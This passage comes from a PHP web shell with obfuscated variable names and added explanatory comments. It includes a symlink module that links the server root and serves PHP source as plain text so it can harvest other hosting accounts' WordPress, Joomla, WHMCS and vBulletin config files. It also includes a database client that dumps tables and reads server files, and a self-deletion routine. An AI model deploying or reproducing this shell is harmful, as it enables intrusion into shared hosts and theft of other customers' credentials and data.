"; madfooter(); } /* madsymlink(): cross-account file read on shared hosts via symlinks. Identifiers are obfuscated (runs of I/l/1). The first statements compute this script's base URL (scheme hard-coded to http; str_replace removes every occurrence of the last path segment, not just the trailing one) for building links into the sym/ directory created below. Modes: p1=website lists zones from /etc/named.conf with the owner of /etc/valiases/<zone>; p2=whole writes sym/.htaccess (serving .php/.html as text/plain, Require None / Satisfy Any) and a symlink sym/root -> /; p3=config does the same and then probes common CMS config paths under each user's public_html through that symlink. */ function madsymlink() { madhead(); $IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']; $IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl ); $IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl ); echo '

| Domains | | Whole Server Symlink | | Config PHP symlink |

'; if(isset($_POST['p1']) && $_POST['p1']=='website') { echo "
"; $d0mains = @file("/etc/named.conf"); if(!$d0mains){ echo "
Cant access this file on server -> [ /etc/named.conf ]
"; } /* No else/return: when the file could not be read the foreach still runs over a non-array. eregi() was removed in PHP 7, so this branch only works on PHP 5. */ echo ""; $count=1; foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo ""; flush(); $count++; }}} echo "
Countdomainsusers
".$count."".$domains[1][0]."".$user['name']."
"; } if(isset($_POST['p2']) && $_POST['p2']=='whole') { @set_time_limit(0); echo "
"; /* whole: sym/ is created world-writable (0777) relative to the process cwd and its .htaccess disables PHP handling inside it. basename('_FILE_') is a literal string (not __FILE__) and the result is never used. */ @mkdir('sym',0777); $IIIIIIIIIIl1 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $IIIIIIIIII1I =@fopen ('sym/.htaccess','w'); fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1); @symlink('/','sym/root'); $IIIIIIIIIlIl = basename('_FILE_'); $IIIIIIIIIllI = @file('/etc/named.conf'); if(!$IIIIIIIIIllI) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; } else { /* Zones matching \.ir or \.il are only re-wrapped in different (now stripped) markup; nothing else changes for them. The symlink is re-created on every iteration. */ echo ""; foreach($IIIIIIIIIllI as $IIIIIIIIIll1){ if(@eregi('zone',$IIIIIIIIIll1)){ preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11); flush(); if(strlen(trim($IIIIIIIIIl11[1][0])) >2){ $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0])); $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ; @symlink('/','sym/root'); $IIIIIIII1I1l = $IIIIIIIIIl11[1][0]; $IIIIIIII1I11 = '\.ir'; $IIIIIIII1lII = '\.il'; if (@eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or @eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) ) { $IIIIIIII1I1l = "
".$IIIIIIIIIl11[1][0].'
'; } echo " "; flush(); } } } } echo "
DomainsUserssymlink
'.$IIIIIIII1I1l.' '.$IIIIIIIII1I1['name']." symlink
"; } if(isset($_POST['p3']) && $_POST['p3']=='config') { echo "
"; /* config: same setup as whole, then for each zone owner issues get_headers() requests back to this server for wp-config.php, configuration.php, includes/config.php and similar paths under sym/root/home/<user>/public_html, labelling the site WordPress/WHMCS/Joomla/vBulletin from whichever answers 200. Around a dozen HTTP round-trips to self per zone. The clients/configuration.php probe is missing its leading slash ('name'.'public_html/...'), so that URL is malformed. */ @mkdir('sym',0777); $IIIIIIIIIIl1 = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $IIIIIIIIII1I =@fopen ('sym/.htaccess','w'); @fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1); @symlink('/','sym/root'); $IIIIIIIIIlIl = basename('_FILE_'); $IIIIIIIIIllI = @file('/etc/named.conf'); if(!$IIIIIIIIIllI) { echo "
# Cant access this file on server -> [ /etc/named.conf ]
"; } else { echo " "; foreach($IIIIIIIIIllI as $IIIIIIIIIll1){ if(@eregi('zone',$IIIIIIIIIll1)){ preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11); flush(); if(strlen(trim($IIIIIIIIIl11[1][0])) >2){ $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0])); $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php'; $IIIIIIIII11I=get_headers($IIIIIIIII1l1); $IIIIIIIII11l=$IIIIIIIII11I[0]; $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php'; $IIIIIIIIlIII=get_headers($IIIIIIIII111); $IIIIIIIIlIIl=$IIIIIIIIlIII[0]; $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php'; $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1); $IIIIIIIIlIll=$IIIIIIIIlIlI[0]; $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php'; $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1); $IIIIIIIIlI1l=$IIIIIIIIlI1I[0]; $IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php'; $IIIIIIIIllII=get_headers($IIIIIIIIlI11); $IIIIIIIIllIl=$IIIIIIIIllII[0]; $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php'; $IIIIIIIIlllI=get_headers($IIIIIIIIllI1); $IIIIIIIIllll=$IIIIIIIIlllI[0]; $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php'; $IIIIIIIIll1I=get_headers($IIIIIIIIlll1); $IIIIIIIIll1l=$IIIIIIIIll1I[0]; $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php'; $IIIIIIIIl1II=get_headers($IIIIIIIIll11); $IIIIIIIIl1Il=$IIIIIIIIl1II[0]; $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php'; $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1); $IIIIIIIIl1lI=$IIIIIIIIl1II[0]; 
$IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php'; $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll); $IIIIIIIIl11I=$IIIIIIIIl1l1[0]; $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php'; $IIIIIIIIl111=get_headers($IIIIIIIIl11l); $IIIIIIII1III=$IIIIIIIIl111[0]; $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php'; $IIIIIIII1II1=get_headers($IIIIIIII1IIl); $IIIIIIII1IlI=$IIIIIIII1II1[0]; /* Classification: "strpos(...) == true" is a loose comparison that is true for any non-zero offset; "200" sits at offset 9 of a normal status line, so the intent holds. client/configuration.php is requested twice and the second result is unused. configuration.php alone is labelled Joomla; it is labelled WHMCS only when submitticket.php also returns 200. Zones with no recognised CMS are skipped (continue). */ $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200'); $IIIIIIII1I1I=' '; if (strpos($IIIIIIIII11l,'200') == true ) { $IIIIIIII1I1I="Wordpress"; } elseif (strpos($IIIIIIIIlIIl,'200') == true) { $IIIIIIII1I1I="Wordpress"; } elseif (strpos($IIIIIIIIlIll,'200') == true and strpos($IIIIIIII1III,'200') == true ) { $IIIIIIII1I1I=" WHMCS"; } elseif (strpos($IIIIIIIIl1lI,'200') == true) { $IIIIIIII1I1I =" WHMCS"; } elseif (strpos($IIIIIIIIl11I,'200') == true) { $IIIIIIII1I1I =" WHMCS"; } elseif (strpos($IIIIIIIIlIll,'200') == true) { $IIIIIIII1I1I=" Joomla"; } elseif (strpos($IIIIIIIIlI1l,'200') == true) { $IIIIIIII1I1I=" Joomla"; } elseif (strpos($IIIIIIIIllIl,'200') == true) { $IIIIIIII1I1I=" vBulletin"; } elseif (strpos($IIIIIIIIllll,'200') == true) { $IIIIIIII1I1I=" vBulletin"; } elseif (strpos($IIIIIIIIll1l,'200') == true) { $IIIIIIII1I1I=" vBulletin"; } else { continue; } $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ; echo '';flush(); } } } } echo "
Domains Script
'.$IIIIIIIIIl11[1][0].' '.$IIIIIIII1I1I.'
"; } echo "
"; madfooter(); } function madsql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return 
@pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $head = true; while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { if($v == null) $item[$k] = "NULL"; elseif(is_numeric($v)) $item[$k] = $v; else $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; $head = false; } else $sql = "\n\t,(".implode(", ", $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' 
('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['p2']=='download') { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } madhead(); echo "
TypeHostLoginPasswordDatabase
"; $tmp = ""; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "'; } else echo $tmp; }else echo $tmp; echo " count the number of rows
"; if(isset($db) && $db->link){ echo "
"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ""; } echo "
Tables:

"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; } echo "
File path:
"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "".$_POST['p2']." ({$num['n']} records) Page # "; echo " of $pages"; if($_POST['p3'] > 1) echo " < Prev"; if($_POST['p3'] < $pages) echo " Next >"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "

"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo "

"; echo "

"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "
Load file
"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '
'; madfooter(); } function madselfrm() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') madhead(); echo "
"; echo "
    
                /^\
       _.-`:   /   \   :'-._
     ,`    :  |     |  :    '.
   ,`       \,|     |,/       '.
  /           `-...-`           \
 :              .'.              :
 |             . ' .             |
 |             ' . '             |
 :              '.'              :
  \           ,-'''-,           /
   `.       /'|     |'\       ,'
     `._   ;  |     |  ;   _,'
        `-.:  |     |  :,-'
              |     |
              |     |
              |     |
              |     |
              |     |
"; echo '
Kill Me?
Yes
'; madFooter(); } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('mad' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'FilesMan'; if( !empty($_POST['a']) && function_exists('mad' . $_POST['a']) ) call_user_func('mad' . $_POST['a']); exit; ?>